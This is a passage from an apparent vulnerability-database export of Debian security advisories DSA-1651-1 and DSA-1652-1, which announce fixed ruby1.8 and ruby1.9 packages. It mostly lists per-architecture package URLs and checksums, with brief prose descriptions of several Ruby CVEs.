4757a7c9b578208d761fe2ccdce3fa41\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 200220 2d8704ff62159bb1e8c2fc635e9cb3b5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199810 4e51aa246f1602dec04095780c0f5170\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1677464 394c17e4c1e40082701773314c3310e0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1869130 04510cbc8347e4cd055f22b11a26b234\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 824102 b40a7f34f9401e1461f2211c904d3153\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1042102 f7f16a8ffb6be3a6a874b49be5904da8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 316154 82f7dcc15c9ef9c542b12830910c72d4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199118 6c2239c266c6e7653449780d6ab18f71\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 219164 2ad50197b6cf436a728c5b615a52a046\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 999668 64201f397337b7478893c08afc261e00\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 293708 2327aefddae4e2dd58e9387e36a3934c\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 219408 e3cef11245e5554bef15f5598df21a8f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197598 56ccc12092d5296e8156c1bc4f411119\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 719716 329bf36bc69b73ac908d6131e12a9933\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 198252 e5df4a73eea74976f81949cfc085c722\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1856646 f839ef877cc1d905f20868ac29d8c6d6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197916 221e994fe9132b0121ae1c1aef4d1a71\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1534674 aff183539b7a3ffb37078d263b4c0fc4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 201426 7700f382729ccb1bf36b7361eda4e1e6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 330536 de290038777d785a40b96ecde67bcb79\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 202400 425437ebd7a25ddcc24f0b00643e0e15\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 971614 157129fd20a8e99bb060eb16d04b9b1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1895636 42981c9c01f3bfe0c29d9c89c67456ea\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 218566 73418bc1a694edf6666a3bef64ab66b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1861876 81df0b92b58078d1414bca3298a801fd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 203346 861ceb05ebf6549fa2872f2f24eafdbd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1026222 1c6b059f43c36a3d2195fb071a21c0c0\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 196588 0b12b7621be85e03e3ccf9bb8bf18252\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 802442 2a8e096b0bdec5cf68ca800bab083058\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 217920 f7ad5607292040314c621508996c10e3\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197376 ceef5241e870f21a04406000cfe861f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 281460 585fe80dfa9e975314e6df5ec9f35490\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1085282 94a0aa16383ec7f2ab88d742cead73c2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1850952 26828e1d9dc0b6d24cfc9a8f5ea1bb33\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1540352 a1c65ec2cd909491de849c9907d2eabc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197514 118cfb3032dd4b79691ba0f79341bcc4\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197666 42073374de4e32b274d2a485896d0734\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1060018 eb935e3e4592e2ac723b87227258526a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 279206 21f76e4afe491f2ceaaa90215e2e6dab\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 198014 6ec3efd9b594a9cc2759d95b61f2a64a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1538558 725d0012a98297cc4ae2c2aa6d76e73f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 218098 a75856178c8addc09ae0db8dd8349b88\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 793332 fff033a8fde91eeaa458f2be3252a7bf\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1830324 a816a6d7bb2059cead4d5be647e66c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197072 cc83f3923ec214e99dfb87552813e524\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 219368 5033aca578c0a97d044b136adf2120d2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 293966 13f4c179f750c4ef69229f5f8c714908\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199990 900f11656f1bbfb7143c96eb6eca55b2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199672 b36fcd86eae4a996aceea9f51ed82b6f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1592660 53543d9b925d742e2dd0bb21842d9484\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199450 7eecb4e14d914ef9ce18297dafeb4beb\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1837328 fc2549416dba4e379f56755dc11cf3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1108684 93123428d72447a94854d3ffa7feba05\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 718932 c59ae18feb43ed2dca6300adabb1a9e4\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 305246 14e3e5cddc2398095a39f5e7db03d50d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 779454 22db8f14e5f3524693854a896d25dc73\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1620164 25eb518ccfa74c490cd894a96d464743\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 199400 7f87e9c92d21d9f0cc27168c15b09e90\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198604 f9b34b538bd4fae60bf1cfd357d78977\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198918 8e6b256da2d93404909bffaf9741cb8a\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 217956 e0603b2614b4402e24763265af2a69aa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1838970 5eb6c09970d3a051d6fe1753893c7222\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1051972 d10d44795254610d6f4becff47d5c3a7\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 961570 c65f0632dc01bc50d209487741fc41f4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1833402 426ef4a80f6c366231813b596c9bf46f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197920 006e1097f7fdc7ac9a8b89413a56f2fe\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1543240 4c4c3f00fd078b2fa6778a3245569e87\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197144 2cd715ed20b9c63c0c264adb6ed1c000\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197866 71c08be787f0a4f683b91fc539ade3c3\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 741182 9c970b4ccbba6cba80d8284218d33ef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 296052 9567adab606aecadbee3006a572f0965\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 217898 b375854870d898692db953c88bf80e53\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-10-12T09:37:30", "published": "2008-10-12T09:37:30", "id": "DEBIAN:DSA-1651-1:0FC77", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00243.html", "title": "[SECURITY] [DSA 1651-1] New ruby1.8 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1652-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.9\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.0.2-6.\n\nWe recommend that you upgrade your ruby1.9 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz\n Size/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.diff.gz\n Size/MD5 checksum: 32500 f9ecc42746b8a277f0adf684db941813\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.dsc\n Size/MD5 checksum: 1102 d9f8325a51dc85e7a592135602aa5adb\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 318568 8829c7b1dc51b1694ec44c22df0b9aa2\n http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 255728 98a8ba887948dad97e365d6fe4cd7365\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 265788 baf95223f575afea5a19eda8931ab20f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 229404 5fd60bd0423a2bf3e7b7d9f2fdbf50f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 694282 195e55b70aaf9f35ff0b3156460c05a0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217526 18e248f393c0157029127735d35ab58c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 237710 40f6ac2464dd488bcec0d9e705457071\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 324622 3daf8b07570c96d9575c851ab21deae3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 340188 8e9d2e6f51f659ad6df94a11961b6429\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1890052 15fa703f9493159f200bc8719305f8f7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 216796 19318b591b6bce163cd767ccbc8e55a0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1881332 5b980e23f25edf7bbc978bbdfb2ffa18\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217544 96ac4e52a0ddbf2a70ae8a49b8468338\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 961014 16b8cfc9ec220aed8a4a6d83b7a903f3\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216496 a612ba557549caf4ba25abe252da8568\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 346006 8ea61f15325461d26752621150af4c55\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1878306 97b41d5d6a9d13ceab9139faf6ec9f36\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 235552 8767d4d810273a9f0177a47a0a08c073\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1850520 0750131f3c14ce426f121099858f02f0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216560 5eb826cce7459050017b7085685e996c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216012 d89ffb0add351472565804edf8dac758\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 807498 f23ac4d1e46337667e6869d896a2c86a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 323396 fd36007f61327bb9e05127cd35e6a2d6\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 888820 f2a52e9d4019c7c6e36df9a557bb2162\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217900 86d51cf0dc80bdbd9d25a39b17eee678\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217536 3ee4c34f85a0dd8b4f8a328a5e8fbc00\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1861420 68df4ad96fd1065b76bf391d753ad79e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 236956 e465433f9cb8186a8326455d59910cc2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1880706 d811527595c9c70569d60581b0b540ea\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 218086 0fc503ce1be877ddcf1ed5110ebc35f5\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 333712 e26dd25bc69b683518214ffda7aa18fc\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 395486 d89dec7193f96ac9ea999af10815b0e4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 309582 1e3e3abbe9099df9839f022207104e4c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216578 6c8c40b3bac4b3008ca37c11d1c15b71\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216352 7ad6c7c069d6922eadc2d51919f42346\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1752688 4c1a4ec5f90608f16b719070239f2dc8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1867752 749baa15c5cdd78016acc2e4a4836f80\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 237500 068288ec56066aad6cd3c0148fa9e6b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 345708 f01d2d77673b54570e3afcf06afb7bb4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 215600 47671e30dd1a142519c40c1efc6559b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 757964 c34682888461aa146d404c9dccb9f987\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 2225874 c1f834cdd95279bbf5eca576c3511088\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220606 3c65aba37358087e1e26a16677e474f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1095774 6d57aff7a609eb69ea57dfeb60b9d831\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220140 46554d54bc95ad8bf90ec33d7c848358\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 236300 1e4719db3ca36aa6b04dc3a66bb3b4f2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220598 3cff195de849212b8bf1c0d2cb4f459b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351424 99c548dbb54ad64f2f15ec9d6cd1157b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351114 67c71c75847c6c24873a077214c6ddb8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1863980 ba885ff9a4bee389cdda5439f9b8838d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 216034 540daf8a0a152b77cbabc0ebf2a6cbe6\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215910 08152af050881fd103cbd3c6283f4c5f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215178 6189e81e3d1fcb8bc3aa64ae688c6736\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1862054 3f09c78df3df2ecafca65180509eeb30\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 236092 0a9c0b2b8031289e850c3a2c9a026e92\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 874098 447b15d2db96e1d6212b721b70289aa9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1680114 aa610eb8728da1c4d45b7d54a4b09058\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 372246 96a282c7252c4edef7ba6712a26dfe6f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 301600 3d528eda6e6da71c3dc5bfb92ac7a131\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1837274 08174e2e8d1128b3977dedcd49d88adf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 215368 c53207b03169c21fae94fc9a252030e0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216122 217425b4ced3f5e260f7c3e16067ccc9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 367470 ad1121d68848d0dd69c37ede15c611b1\n 